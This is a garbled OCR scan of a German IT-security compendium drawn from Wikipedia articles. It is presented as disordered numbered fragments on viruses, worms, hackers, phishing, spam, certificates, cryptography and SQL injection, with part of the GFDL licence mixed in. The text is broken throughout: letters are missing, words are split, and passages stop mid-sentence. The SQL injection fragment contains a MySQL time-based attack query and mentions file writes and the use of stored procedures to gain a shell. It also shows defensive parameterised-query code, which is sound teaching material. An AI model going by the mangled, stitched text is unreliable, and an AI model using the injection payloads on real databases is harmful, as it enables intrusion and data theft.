204. daf r zu sorgen dass nur zertifizierte Makros von der Anwendung ausgef hrt werden Dies ist ins besondere f r gr ere Unternehmen und Beh rden von Interesse wo eine zentrale Zertifizierungsstelle Makros zum allgemeinen Gebrauch vor deren Freigabe berpr ft und akzeptierte Makros zertifiziert Es empfiehlt sich weiterhin das automatische Ausf hren von Makros in der entsprechenden Anwendung auszuschalten Skriptviren Skripten sind Programme die nicht wie normale Program me kompiliert sondern interpretiert werden Sie werden h ufig auf Web servern verwendet z B Perl PHP bzw in Webseiten eingebettet z B JavaScript Skripten werden gerne in Webseiten zus tzlich zu normalem HTML oder XML eingesetzt um Funktionen zu realisieren die sonst nur unter Zuhilfenahme ausf hrbarer Programme auf dem Server CGI Program me realisierbar w ren Solche Funktionen sind zum Beispiel G steb cher Foren dynamisch geladene Seiten oder Webmailer Skriptsprachen sind meist vom Betriebssystem unabh ngig Um ein Skript auszuf hren wird ein passender Interpreter ein Programm das das Skript von einer f r den Menschen lesbaren Sprache in eine interne Repr sentation umsetzt und dann ausf hrt ben tigt Wie alle anderen Viren auch sucht das Skriptvirus eine geeignete Wirtsdatei die es infizieren kann lt head gt lt meta http equir Content Type content text html charset iso 8853 1 gt lt meta name AUTHOR content
205. dann ist man ein Hacker Der technologische Teil der Definition wird auch jenseits des CCC von einigen Hardwaredesignern Case Moddern Autotunern und PC Twea kern adoptiert welche sich ebenfalls Hacker nennen Der Begriff Hack steht auch f r die Erweiterung von komplexen Pro grammen oder f r einen Code der Zugang zu einem Ger t verschafft bzw eine neue Funktion verspricht die in dieser Form vom Hersteller nicht 177 Sonstige Themen vorgesehen war z B Playstation Hack Wie so oft verwischt sich hier zu meist die Spur zwischen den Begriffen Hacker und Softwarecracker Zudem existiert durchaus die Meinung dass jeder Mensch der einen Artikel in einem Wiki anpasst oder gar erstellt ein Hacker ist Menschen die ma geblich daran beteiligt waren das Internet auf zubauen oder die aktuell dazu beitragen den Nutzen des Internets ent scheidend zu erweitern werden unter den meisten Insidern ebenso ein vernehmlich als Hacker bezeichnet wie die Entwickler der wichtigsten Meilensteine in Bezug auf Wissenschaft Technik und Software quivalent zum sprachgebr uchlichen Verst ndnis des Begriffs Hacker gibt es auch zahlreiche Insider welche die wahre Herausforderung eines Hackers darin sehen Sicherheitsmechanismen zu berlisten und somit Schwachstellen erkennen zu k nnen Oft verstehen Insider unter einem Hack auch eine verbl ffend einfache elegante und pfiffige L sung eines nichttrivialen Problems Als besonders geschi
206. dass SQL In jektionen nicht mehr m glich sind Das haupts chliche Problem der meis ten Programmierer ist fehlendes Wissen ber diese Art von Angriffen Nachfolgend einige Beispiele um die Angriffe abzuwehren 218 SQL Injektion Au erdem sollten nicht ben tigte Stored Procedures aus dem Datenbank system entfernt werden Beim Microsoft SQL Server sollte auch gepr ft werden ob der Einsatz unter einem Account mit eingeschr nkten Zu griffsrechten m glich ist was in der Regel der Fall sein d rfte Microsoft NET Framework Im NET Framework gibt es einfache Ob jekte mit denen man solche Probleme umgeht Anstatt SqlCommand cmd new SqlCommand SELECT spaltel FROM tabelle WHERE spalte2 spalte2Wert sollte Folgendes verwendet werden string spalte2Wert Mein Wert SqlCommand cmd new SqlCommand SELECT spaltel FROM tabelle WHERE spalte2 spalte2Wert cmd Parameters Add spalte2Wert spalte2Wert Java SQL Injection kann leicht durch bereits vorhandene Funktionen verhindert werden In Java wird zu diesem Zweck die PreparedStatement Klasse verwendet Anstatt Statement stmt con createStatement ResultSet rset stmt executeQuery SELECT spaltel FROM tabelle WHERE spalte2 spalte2Wert sollte Folgendes verwendet werden PreparedStatement pstmt con prepareStatement SELECT spaltel FROM tabelle WHERE spalte2 pstmt setString 1 spalte2Wert ResultSet rs
207. dass sie fehlerfrei sind Man geht in der Regel sogar davon aus dass zahlreiche Fehler enthalten sind Einige dieser Fehler lassen sich dazu benutzen Programm Codes auszuf hren was aber nat rlich durch den Programmierer der fehlerhaften Anwendung niemals vorgesehen war Geschickt geformte Daten k nnen so pl tzlich einen MP3 Player z B ver anlassen Dateien zu l schen Sch tzen kann man sich dagegen durch viel Aufmerksamkeit Allge mein gilt dass Software Betriebssystem E Mail Software immer auf dem neuesten stabilen Stand sein sollte Viele W rmer nutzen Sicherheits l cken veralteter Softwareversionen um sich zu verbreiten Rechner deren Software auf dem neuesten Stand und deren bekannte Sicherheitsl cken beseitigt sind sind deutlich schwerer zu infizieren Au erdem gilt es sich zu informieren ob in den verwendeten Anwendungen und im Betriebs system Sicherheitsl cken existieren und wie man diese L cken schlie en kann Bei wiederholt auff lligen Anwendungen ist zu berlegen ob man diese Anwendung wirklich weiter einsetzen m chte Unterscheiden muss man noch Client Anwendungen bzw nicht netz werkf hige Anwendungen und Server Anwendungen Die erste Klasse von Anwendungen muss vom Benutzer des Computers dazu veranlasst werden Daten zu verarbeiten Ein E Mail Programm beispielsweise holt nur vom Benutzer initiiert E Mails ab ber das Netzwerk l sst sich die ser Vorgang nicht steuern Gegen L cken in solchen Anwendun
208. dateien online Testergebnisse AntiVir wurde im Vergleich zu anderen Anti Viren Programmen schon h ufig getestet 80 AntiVir 2005 Bei einem Vergleich der Zeitschrift PC Welt vom 19 August 2005 bei dem die Reaktionszeit von Herstellern verschiedener Antiviren Tools im Zusammenhang mit dem Zotob Wurm getestet wurde ist festge stellt worden dass in diesem Fall bei AntiVir nicht einmal ein Update der Virendefinitionsdatei n tig war da der Sch dling auch ohne Up date bereits geblockt wurde Bei Tests am 18 02 und 10 03 2005 lag die Reaktionszeit des Herstellers etwa im Mittelfeld In der Ausgabe 1 2005 der renommierten Zeitschrift c t aus dem hei se Verlag schnitt AntiVir nur unterdurchschnittlich ab da es sowohl vom Funktionsumfang als auch von der Erkennungsleistung die Tester nicht berzeugen konnte Weiterhin wurde bem ngelt dass AntiVir beijedem Update die kompletten aktualisierten Virendefinitionen neu herunterl dt und so kaum f r Nutzer zu empfehlen sei die ber keinen schnellen Internet Zugang wie zum Beispiel DSL verf gen Ein inkre mentelles Update bei dem nur noch die zus tzlichen neuesten Defini tionen heruntergeladen werden ist aber seit Mitte Oktober verf gbar 2004 Virus Bulletin ein internationales Fachblatt f r Computersicherheit verlieh AntiVir im Juni 2004 den Virus Bulletin 100 Award auf grund der Erkennungsraten von In the wild Viren Weiterhin wurde die Schnelligkeit und gering
209. ddition Copying with changes limited to the covers as long as they preserve the title of the Document and satisfy these conditions can be treated as verbatim copying in other respects If the required texts for either cover are too voluminous to fit legibly you should put the first ones listed as many as fit reasonably on the actual cover and continue the rest onto adjacent pages If you publish or distribute Opaque copies of the Document numbering more than 100 you must either include a machine readable Transparent copy along with each Opaque copy or state in or with each Opaque copy a computer network location from which the general network using public has access to download using public standard network protocols a complete Transparent copy of the Document free of added material If you use the latter option you must take reasonably prudent steps when you begin distribution of Opaque copies in quantity to ensure that this Transparent copy will remain thus accessible at the stated location until at least one year after the last time you distribute an Opaque copy directly or through your agents or retailers of that edition to the public It is requested but not required that you contact the authors of the Document well before redistributing any large number of copies to give them a chance to provide you with an updated version of the Document 4 MODIFICATIONS You may copy and distribute a Modified Version of the Document under the
210. de Rechnung veranschaulicht das Unter der Annahme dass jeder infizierte Benutzer 20 Eintr ge in sei nem Adressbuch hat und die H lfte der Empf nger den Anhang ffnen Ebene neu infiziert neu versendete Mails 1 1 20 2 10 200 3 100 2 000 4 1 000 20 000 5 10 000 200 000 Quelle http de wikipedia org wiki Loveletter Historie 21 3 05 Angelegt von Frog23 danach bearbeitet von den Hauptautoren Hendrik Brummermann Frog23 Kaiblankenhorn Suricata Stf Steven Malkovich Sven423 sterreicher MichaelDiederich 12 1 06 1 2 06 WikiPress Redaktion Sobig F Sobig F oder exakt W32 Sobig F mm ist ein am 18 August 2003 ent deckter Computerwurm Er wurde vermutlich ber eine pornografische Newsgroup freigesetzt und ist der sechste aus einer Serie von immer aus gekl gelteren Internet W rmern die seit Januar 2003 ins Netz gebracht worden sind W32 Sobig F mm wird als netzwerkaktiver Massen Mail Wurm charakterisiert der sich an alle E Mail Adressen sendet die er in Dateien mit den Erweiterungen dbx eml hlp htm html mht wab oder txt findet Der eingenistete Wurm ffnet auf den befallenen Rech nern Ports zum Internet installiert einen eigenen Mailserver und sendet parallel unabl ssig infizierte E Mails an beliebige Empf nger Wenn der Wurm Sobig F aktiviert ist kopiert er sich in das Windows Verzeichnis mit dem Namen WINPPR32 EXE und legt eine Konfigura tionsdatei mit dem Namen WINSTT32 DAT im selben Ver
211. den schreiben zum Teil Freeware oder Open Source Software 178 Hacker oder bet tigen sich konstruktiv in einem anderen Umfeld welches zu den zahlreichen Insiderdefinitionen des Begriffs Hacker passt Crasher legen hingegen Computer und Telefonnetze lahm l schen oder ver ndern wichtige Daten bereichern sich auf kriminelle Art oder terrorisieren ihre Mitmenschen durch absichtlich herbeigef hrte Abst rze der Rechner Doch sp testens wenn es um politisch motivierte Aktionen geht wird er sichtlich dass es an einer wirklich klaren Trennlinie zwischen gut und b se mangelt was eine solche Unterteilung unpraktikabel macht Demgegen ber verwenden die meisten Menschen Hacker weiterhin als Oberbegriff der sowohl die guten Hacker als auch die b sen Cracker bzw Crasher einschlie t und dominieren so die umgangssprach liche Bedeutung Bezogen auf die IT Sicherheit ist der Begriff Hacker in dieser Form l ngst zu einem Elementarbegriff geworden Black White und Grey Hats In der IT Security Szene wird manchmal eine Unterteilung der Hacker in Black White und Grey Hats benutzt die auf der Einteilung aus alten Western Filmen basiert welche Cowboys auf Grund ihrer Hutfarbe als b se schwarz gut wei oder neu tral grau charakterisiert Black Hats Schwarz H te handeln mit krimineller Energie entwe der um das Zielsystem zu beschadigen oder um Daten zu stehlen Zu dieser Untergruppe g
212. den nachdem der Fehler bemerkt wurde ist dieser Fall ein Zeichen daf r dass man sich nicht immer auf die Vertrauensw rdigkeit von Zertifizierungsstellen ver lassen kann Obendrein sind viele Browser so eingestellt dass sie nicht st ndig berpr fen ob Zertifikate zur ckgezogen wurden In diesen F l len w rde die Sperrung gar nicht bemerkt und die falschen Zertifikate w rden immer noch als echt angesehen Wer nachsehen m chte Im Internet Explorer sind die beiden zur ck gezogenen Zertifikate unter Extras gt Internetoptionen gt Inhalte gt Zertifikate gt Nicht vertrauensw rdige Herausgeber zu sehen Sie sind als Fraudulent NOT Microsoft gekennzeichnet Anbieter kostenlose SSL Zertifikate CAcert kostenlose E Mail Zertifikate Thawte 148 Zertifizierungsstelle Zertifizierungsdiensteanbieter mit Anbieterakkreditierung Authentidate International AG D sseldorf Zeitstempel D Trust GmbH Berlin Zertifikat Zeitstempel DATEV e G N rnberg Zertifikat Zeitstempel Deutsche Post Com GmbH GF SignTrust Bonn Zertifikat Zeit stempel Deutsche Telekom AG GF TeleSec Netphen Zertifikat Zeitstempel TC TrustCenter AG Hamburg Zertifikat Zeitstempel weitere Rechtsanwalts Steuerberater oder Wirtschaftspr ferkam mern i d R Zertifikat Zeitstempel Quelle http de wikipedia org wiki Digitales_Zertifikat Historie 15 10 03 Anonym angelegt danach bearbeitet von den Hauptautore
213. der Aufkl rung und entsprechender Bildungskonzepte die B rgern und Verbrauchern helfen sich auch beim Surfen im WWW und erst Recht bei finanziellen Transaktionen im Internet zu sch tzen F r einen angemessenen Selbst datenschutz ist also notwendig dass sowohl verl ssliche Informationen bereitgestellt als auch Technologien zum Schutz der pers nlichen Daten entwickelt werden Nur wenn das Wissen der Nutzer und die technischen L sungen der Komplexit t der Technik gerecht werden k nnen die Risi ken wirksam minimiert werden Staatliche Datenschutz Institutionen wie das ULD in Kiel aber auch privatrechtliche Vereine und Verb nde stellen diesbez glich Informatio nen und Open Source Software zur Verf gung so dass auch EDV Laien sich selbst vor den Gefahren im Informationszeitalter effektiv sch tzen k nnen Quelle http de wikipedia org wiki Selbstdatenschutz Historie 25 9 04 Anonym angelegt danach bearbeitet von den Hauptautoren Aljoscha MichaelDiederich Learny Steven Malkovich anonym 12 1 06 1 2 06 WikiPress Redaktion 155 Sonstige Themen Vorratsdatenspeicherung Vorratsdatenspeicherung ist ein Begriff aus dem deutschen Datenschutz und Telekommunikationsrecht Er bezeichnete urspr nglich die Speiche rung von personenbezogenen Daten f r eine sp tere Verarbeitung wobei der Verarbeitungszweck zum Zeitpunkt der Speicherung noch nicht klar feststeht Erforderlichkeitsgrundsatz Eine Speicherung von personenb
214. der BIOS Boot Ein stellung auf diesen Sektor zu und f hrt ihn aus Der Virus versucht da nach den MBR der Festplatte zu infizieren um bei jedem Start des Com puters ausgef hrt zu werden Wenn ein infizierter Computer startet wird der MBR geladen der normalerweise f r das Erkennen der verschiedenen Partitionen der Festplatte zust ndig ist Der Virus der nun geladen wird bleibt im Speicher und berwacht die Zugriffe aufandere Disketten Wenn eine Diskette in einen mit einem Bootsektorvirus infizieren Computer ge legt wird wird der Virus im Speicher aktiv und infiziert den Bootsektor der Diskette Seit 2005 gibt es auch Bootsektorviren f r CD ROMs Diese infizieren bootf hige Imagedateien ISO Images Es ist technisch m g lich einen Bootsektorvirus f r einen USB Stick oder f r ein LAN Netz werk zu erstellen dies ist aber bis 2005 noch nicht geschehen Heutzutage gibt es beinahe keine Bootsektorviren mehr da BIOS und Betriebssysteme meistens einen gut funktionierenden Schutz haben Zwar gibt es Bootsek torviren die diesen Schutz umgehen k nnen doch ist ihre Verbreitung zu langsam um ein Problem darstellen zu k nnen Zu den Bootviren geh rt beispielsweise auch der Form Virus Quelle http de wikipedia org wiki Bootvirus Historie 14 7 04 Anonym angelegt danach bearbeitet von den Hauptautoren Gunter krebs Steffen Achim Raschka anonym 12 1 06 1 2 06 WikiPress Redaktion 45 Viren W rmer Trojaner Form V
215. der beispielsweise die Lam pen P Q W S auf Wichtig und kryptografisch stark ist dass anders als bei einfachen monoalphabetischen Verschl sselungssystemen bei denen ein Klartextbuchstabe stets in denselben Geheimtextbuchstaben verwan delt wird man spricht von einem festen Alphabet bei der Enigma sich aufgrund der Rotation der Walzen das zur Verschl sselung benutzte Al phabet mit jedem weiteren eingegebenen Buchstaben ndert Dies wird als polyalphabetische Verschl sselung bezeichnet W rden sich die Walzen der Enigma nicht drehen so bek me man nur eine einfache monoalpha betische Verschl sselung Aufbau Rechts vom Walzensatz befindet sich die Eintrittswalze Stator die sich nicht dreht und deren Kontakte ber 26 Dr hte in der Prinzipskizze rechts sind nur vier davon gezeichnet mit den Buch stabentasten verbunden sind Links vom Walzensatz befindet sich die Umkehrwalze UKW die ebenfalls feststeht Bei ihr handelt es sich um eine Erfindung DRP 452 194 angem 21 3 1926 von Willi Korn einem Mitarbeiter von Scherbius Sie weist nur auf ihrer rechten Seite 26 Kontakte auf in Abb 35 Skizze Prinzipieller Aufbau der Enigma der Skizze sind wieder nur vier da 24 Walzensatz Lampenfeld Tastatur und Steckerbrett von eingezeichnet die paarweise miteinander verbunden sind Die Umkehrwalze bewirkt dass der Strom der den Walzensatz zun chst von rechts nach links durchflie t umge lenkt wird und ihn noch ein
216. der das Dokument identifiziert chiffrieren kann Der Hash Wert des Dokumentes wird vom Empf nger der Nachricht errechnet und mit dem chiffrierten Hash Wert der mit dem ffentlichen Schl ssel des Absenders dechiffriert werden kann auf bereinstimmung gepr ft Sind beide Hash Werte gleich ist sichergestellt dass der Absender im Besitz des geheimen Schl ssels ist und das Dokument signiert hat eheim Geschichte Asymmetrische Verfahren sind ein relativ neues Gebiet der Kryptogra fie Eine wichtige Vorarbeit f r die asymmetrischen Verfahren sind die Arbeiten von Whitfield Diffie Martin Hellman und Ralph Merkle zum geheimen Schl sselaustausch Anfang der 1970er Jahre Im Sommer 1975 ver ffentlichten Diffie und Hellman eine Idee zur asymmetrischen Ver schl sselung ohne jedoch ein genaues Verfahren zu kennen Anfang der 1970er Jahre wurde von Ellis Cocks und Williamson ein dem sp teren Verfahren von Diffie Hellman hnliches asymmetrisches Verfahren entwickelt welches aber in seiner wirtschaftlichen Bedeutung nicht erkannt und aus Geheimhaltungsgr nden nicht wissenschaftlich publiziert und auch nicht zum Patent angemeldet wurde Alle drei waren Mitarbeiter des englischen Government Communications Headquarters 278 Asymmetrisches Kryptosystem Der Durchbruch gelang Ronald L Rivest Adi Jahr Kryptosystem Shamir und Leonard M Adleman die 1977 das a RSA Verfahren entwickelten Es gilt bis heute als T979 Ra sicheres Ve
217. deutsch Jede Version dieser Lizenz bekommt eine eindeutige Versionsnummer Wenn im Dokument steht dass es dieser Lizenz in einer bestimmten Versionsnummer oder in jeder sp teren Version unterstellt ist dann haben Sie die Wahl entweder den Bestimmungen und Konditionen der genannten Version oder denen jeder sp teren Version zu folgen die von der Free Software Foundation ver ffentlicht wird nicht als Entwurf Wenn das Dokument keine Versionsnummer dieser Lizenz angibt k nnen Sie zwischen jeder beliebigen Version nicht als Entwurf w hlen die von der Free Software Foundation ver ffentlicht wurde ANHANG WIE SIE DIESE LIZENZ AUF IHRE DOKUMENTE ANWENDEN K NNEN Um diese Lizenz auf ein Dokument anzuwenden das Sie geschrieben haben f gen Sie Ihrem Dokument eine Kopie der englischsprachigen Originalversion dieser Lizenz hinzu und setzen Sie den folgenden Copyright und Lizenzhinweis gleich hinter die Titelseite Copyright c YEAR YOUR NAME Permission is granted to copy distribute and or modify this document under the terms of the GNU Free Documentation License Version 1 2 or any later version published by the Free Software Foundation with no Invariant Sections no Front Cover Texts and no Back Cover Texts A copy of the license is included in the section entitled GNU Free Documentation License Auf Deutsch Copyright c JAHR IHR NAME Es ist erlaubt dieses Dokument zu vervielf ltigen zu verbreiten und oder zu ver nd
218. e Sehr geehrter Kunde oder Sehr geehrtes Mitglied Fehler Rechtschreib und Grammatikfehler im Text beispielsweise ae anstatt oder ungebr uchliche Worte beispielsweise eintas ten anstatt eingeben Meist fehlende oder fehlerhafte Zertifikate der Webseite E Mails in denen man nach pers nlichen Daten wie Passw rtern oder TANs gefragt wird sind grunds tzlich gef lscht und k nnen gel scht werden selbst wenn sie keine der oben genannten Merkmale aufweisen 232 Phishing Sind Sie Opfer einer Phishing Mail geworden sollten Sie unverz glich das betreffende Dienstleistungsunternehmen meist Bank Sparkasse Versandhaus Kontaktportal informieren und die rtliche Kriminalpo lizei einschalten Die gef lschte E Mail sollte gespeichert und weitergelei tet werden Sofern Sie es noch selbst k nnen sollten Sie Ihre Passw rter PINs unverz glich ndern damit die gestohlenen Originalpassw rter unbrauchbar werden Schutz Allgemein gilt Banken und Versicherungen bitten nie um die Zusendung von Kreditkartennummern PIN TAN oder anderen Zugangsdaten per E Mail per SMS oder telefonisch Finanzdienstleister senden bei sicher heitsrelevanten Fragen Briefe und Einschreiben via Briefpost bzw man bittet um einen pers nlichen Besuch des Kunden in der Filiale Rufen Sie niemals die Websites sicherheitsrelevanter Dienste ber ei nen Link aus einer unaufgefordert zugesandten E Mail auf URLs und E Mail Absend
219. e der Einsatz von Personal Firewalls von Anfang an in der Newsgroup de comp security heute de comp security firewall Si cherheitsl cken werden durch nicht vertrauensw rdige oder fehlerhafte Software verursacht oder durch deren unsachgem e Konfiguration Es sei der falsche Weg diesem Sicherheitsproblem durch Hinzuf gen zus tz licher Software zu begegnen die dann ebenfalls fehlerhaft oder fehlkon figuriert sein k nne Personal Firewalls w rden die Komplexit t des Ge samtsystems und somit dessen Angriffsfl che erh hen Manchmal f llt im Zusammenhang mit Firewalls das Schlagwort Ri sikokompensation Dahinter steckt die Annahme Computeranwender w rden sich leichtsinniger verhalten wenn auf dem PC Sicherheitssoft ware installiert ist Das kritische FAQ der Newsgroup de comp security firewall gesteht Personal Firewalls zu dass man deren Logs benutzen kann um mehr ber den durch den eigenen Rechner initiierten Netzverkehr zu lernen Ein genaues Verst ndnis der Vorg nge setzt Kenntnisse ber die Internet protokollfamilie voraus Schutz vor Angriffen von au en Personal Firewalls k nnen vor eini gen automatisierten Angriffen sch tzen So kann man beispielsweise den Sasser Wurm mit den meisten Personal Firewalls erfolgreich abweh ren Viele solcher Angriffe lassen sich ohne Firewall durch eine restrik tive Netzwerkkonfiguration abwehren zum Beispiel indem ungenutzte Dienste abgeschaltet werden Eine Personal Fir
220. e E Mail Adresse einer bestimmten Drittperson in der E Mail angege E Mail Spam ben Verfolgungsma nahmen gegen den vermeintlichen T ter treffen E Mail Spam wird auch als UBE unsolicited bulk e mail bezeichnet Je und schaden der Drittperson was das eigentliche Ziel des Joe Jobs ist nach Motiv und Ursache unterscheidet man HOAXes Sensationelle aber meist falsche Ger chte die unbedarft Unsolicited Commercial E Mail UCE also Werbung Meist handelt es sich dabei um dubiose oder besonders g nstige Angebote bzgl Sex Penis oder Lebensverl ngerung Software Markenprodukte Medika an m glichst viele Freunde und Bekannte weitergeleitet werden weil sie so aufregend sind z B auch Kettenbriefe Im Gegensatz zu W rmern wird hier der Empf nger selbst dazu gebracht die Mail zu verbreiten mente etc Scam Beworben wird hierbei oft eine Gelegenheit bei der der Emp f nger leicht an Geld kommen kann Besonders h ufig f llt dabei die Nigeria Connection auf leicht zu erkennen an einem sehr langen lar moyanten anbiedernden Text oft in Gro buchstaben und mit gerade zu aberwitzig hohen Geldbetr gen Definition von UCE Der Inhalt der E Mail muss werbender Natur sein Enth lt der Inhalt nicht wenigstens entfernt Werbung handelt es sich nicht um UCE Insbesondere sind die Massenaussendungen die W r mer und Trojaner erzeugen keine unerw nschte Werbe E Mail sondern nur Unsolicited Bulk E mail kurz UBE 192 193
221. e um gegen die von SCO bisher unbewiesenen Vorw rfe und damit in Zusammenhang ste henden Klagen vorzugehen der Einsatz von Linux w rde gegen Patente von SCO versto en Wieder andere Spekulationen gehen davon aus dass der Wurm von so genannten UBE UCE bzw Spam Versendern in die Welt gesetzt wurde um so eine gro e Anzahl von infizierten Rechnern zum Versand von UBE UCE nutzen zu k nnen Die Variante Mydoom bb verwendet Suchmaschinen um neue E Mail Adressen zu erhalten Betreffzeilen wie Error Delivery failed oder Postmaster deuten auf den Virus hin Der Code verbirgt sich in einer angeh ngten Datei die Java exe oder Service exe hei en kann 66 Mydoom Zeitlicher Ablauf 26 Januar 2004 Der Mydoom Wurm wird das erste Mal gegen 13 00 Uhr UTC gesichtet Die ersten verseuchten Mails treffen aus Russland ein Die schnelle Verbreitung des Wurms sorgt f r ein paar Stunden zu einer durchschnittlich 10 prozentigen Verlangsamung des Internetver kehrs und einer durchschnittlich erh hten Ladezeit der Webseiten von 50 Prozent Sicherheitsexperten berichten zu dieser Zeit dass durch schnittlich jede zehnte eingehende E Mail virenverseucht ist Obwohl Mydooms Denial of Service Attacke gegen die SCO Group erst am 1 Februar 2004 starten soll ist die Webseite der SCO Group wenige Stunden nach Ausbruch des Wurms nicht mehr erreichbar Es ist nicht bekannt ob Mydoom daf r verantwortlich ist Die Webseite der SCO Group
222. e Mail annimmt Wenn der Absender als Spammer registriert ist wird die Annahme verweigert Ein bekannter frei zug nglicher RBL Server ist spamhaus org 199 Sonstige Themen Graue Listen n tzen die Tatsache aus dass Spamschleudern h ufig das Mailprotokoll nicht korrekt einhalten Wenn eine Mail eingeht wird die Annahme zun chst verz gert und die Absendeadresse kommt vor ber gehend auf eine graue Liste Wenn der Absender nach einer bestimmten Zeit die Sendung wiederholt gilt er als konform und wird von der grauen Liste entfernt anderenfalls wird die Mail ignoriert Auf Wunsch kann ein einmal als konform erkannter Absender in eine wei e Liste eingetragen werden und wird in Zukunft direkt akzeptiert Es kann allerdings auch passieren dass seri se Absender bei diesem Verfahren durchfallen weil deren Mailserver falsch konfiguriert sind Beschwerden Rechtsweg Das wohl effektivste Verfahren zur nachhalti gen Bek mpfung von Spam d rfte sein sich beim Provider des Spammers zu beschweren Sollte damit die gew nschte Wirkung ausbleiben ist der Rechtsweg g nstig Durch die entstehenden Verfahrenskosten und zu zahlenden Ordnungsgelder wird der Versand von Spam unlukrativ Die ineffizienteste aber gemeinn tzigste Gegenma nahme besteht da rin den Provider des T ters zu ermitteln und sich dort zu beschweren Die eskalierende UBE Flut kommt n mlich nur von einer begrenzten An zahl an Providern die Beschwerden noch nicht einmal b
223. e Out look und auch andere Programme zum Anzeigen von HTML E Mails benutzt F r diese Sicherheitsl cke hat Microsoft in der Zwischenzeit ein Update bereitgestellt Zum Ausf hren von Wurm Anh ngen enth lt eine E Mail HTML Code der ein Fenster im Fenster iframe erzeugt in dem der Datei Anhang mit Hilfe eines Scripts z B JScript oder VBScript ge startet wird Der Wurm verschickt sich selbst wobei aus dem Adressbuch des Benutzers wahllos Empf nger und Absenderadressen entnommen werden Es ist daher sinnlos beim Empfang einer verseuchten E Mail eine Warnung an die Absenderadresse zu schicken es trifft h chstwahr scheinlich den Falschen Eine hnliche Sicherheitsl cke existierte auch im E Mail Programm Eudora Auch gibt es W rmer welche es nicht haupts chlich auf die Rechner von Anwendern absehen sondern auf Servercomputer So spezialisierte sich in der Vergangenheit eine ganze Reihe von W rmern auf Sicherheits l cken im Internet Information Server weit verbreitete Webserver Soft ware f r Windows Nach der Infektion begannen die Server selbstst ndig nach weiteren Servern zu suchen um auch diese zu infizieren Instant Messaging W rmer Instant Messaging Programme sind so ge nannte Chat Programme wie zum Beispiel ICQ oder MSN Messenger Ein Wurm dieser Art verbreitet sich indem er allen Kontakten einen Link zu einer Seite schickt welche den Wurm enth lt Klickt der Benutzer auf den Link wird der Wurm auf dem Comp
224. e Systembelastung des Programms positiv hervorgehoben Testberichte de f hrte AntiVir in der kostenfreien Version mit der Durchschnittsnote 2 4 auf Platz 1 der Preis Leistungs Liste empfahl aber andere kostenpflichtige Produkte 2003 Das PC Magazin k rte AntiVir Ende 2003 zum einzigen ernst zu neh menden Antivirenprogramm das Privatanwendern dauerhaft kostenlos zur Verf gung steht bem ngelte aber die heuristische Erkennung neu er Viren Der Virenw chter arbeitete im Test effektiv berpr fte aber keine eingehenden E Mails solange darin enthaltene ausf hrbare Bestandteile nicht ge ffnet wurden Die Reparatur infizierter Dateien klappte nicht immer Quelle http de wikipedia org wiki AntiVir Historie 12 11 04 Angelegt von Tiefflieger danach bearbeitet von den Hauptautoren JD Melancholie Tiefflieger Stoerte Steven Malkovich Achim Raschka MichaelDiederich Crux Lib Mnh anonym 12 1 06 1 2 06 WikiPress Redaktion 81 Software Botnet Unter einem Botnet versteht man ein fernsteuerbares Netzwerk im Inter net von PCs welches aus untereinander kommunizierenden Bots besteht Diese Kontrolle wird durch Viren bzw Trojanische Pferde erreicht die den Computer infizieren und dann auf Anweisungen warten ohne auf dem infizierten Rechner Schaden anzurichten Diese Netzwerke k nnen f r Spam Verbreitung Denial of Service Attacken usw verwendet werden zum Teil ohne dass die betroffenen PC Nutzer etwas davo
225. e Variante stellt auch gleichzeitig die potenziell gef hrlichste dar Wenn der Daten bankserver die Kommandos SELECT INTO OUTFILE beziehungswei se SELECT INTO DUMPFILE unterst tzt k nnen diese Kommandos dazu benutzt werden Dateien auf dem Dateisystem des Datenbankservers abzulegen Theoretisch ist es dadurch m glich falls das Bibliotheksver zeichnis des Betriebssystems oder des Datenbankservers fiir denselben beschreibbar ist wenn dieser zum Beispiel als Root lauft einen beliebigen Code auf dem System auszufihren Zeitbasierte Angriffe Wenn der Datenbankserver Benchmark Funktio nen unterst tzt kann der Angreifer diese dazu nutzen um Informationen ber die Datenbankstruktur in Erfahrung zu bringen In Verbindung mit dem if Konstrukt sind der Kreativit t des Angreifers kaum Grenzen ge setzt Das folgende Beispiel ben tigt auf einem MySQL Datenbankserver mehrere Sekunden falls der gegenw rtige User Root ist SELECT if user like root benchmark 100000 shal test false Erlangung von Adminstratorrechten Bei bestimmten Datenbankser vern wie dem Microsoft SQL Server werden Stored Pocedures mitgelie fert die unter anderem dazu missbraucht werden k nnen einen neuen Benutzer auf dem angegriffenen System anzulegen Diese M glichkeit kann dazu benutzt werden um zum Beispiel eine Shell auf dem angegriffenen Rechner zu starten Gegenma nahmen Es ist nicht schwer bestehende Programme so umzubauen
226. e k nnen Buchstaben und W rter zugeordnet werden und der Klartext rekonstruiert werden 272 Kryptoanalyse Seitdem Computer durch ihre Geschwindigkeit und Pr zision die statis tischen Bindungen in einem verschl sselten Text auf fast Null reduzie ren m ssen neue Analysetechniken verwendet werden den Verschl s selungsalgorithmus aufzudecken eine Schwachstelle im Algorithmus auszunutzen wie auch schon die Statistik Schwachstellen nutzte und den Schl ssel zu rekonstruieren mit dem die Nachricht verschl sselt wurde Wenn es um die Analyse einer alten nicht mehr bekannten Schrift geht spricht man von Entzifferung Angriffsszenarien Nach dem Kerckhoffschen Prinzip geht man grunds tzlich davon aus dass der Angreifer das grunds tzliche Verschl sselungsverfahren kennt jedoch nicht den verwendeten Schl ssel Es hat sich in der Vergangen heit immer wieder gezeigt dass Verschl sselungsverfahren die nur auf der Geheimhaltung des Algorithmus beruhen schwach sind Fr her oder sp ter wurde der Algorithmus gefunden oder durch diverse Verfahren aufgedeckt Ziel eines Angriffes ist die Ermittlung des geheimen Schl ssels der dann in der Zukunft beliebige Entschl sselungen erlaubt Man unterscheidet verschiedene Angriffszenarien auf ein Kryptosys tem Brute Force Brute Force Methode Alle m glichen Schl ssel werden nacheinander durchprobiert Die Reihenfolge wird gegebenenfalls nach der Wahrscheinlichkeit ausgew hlt
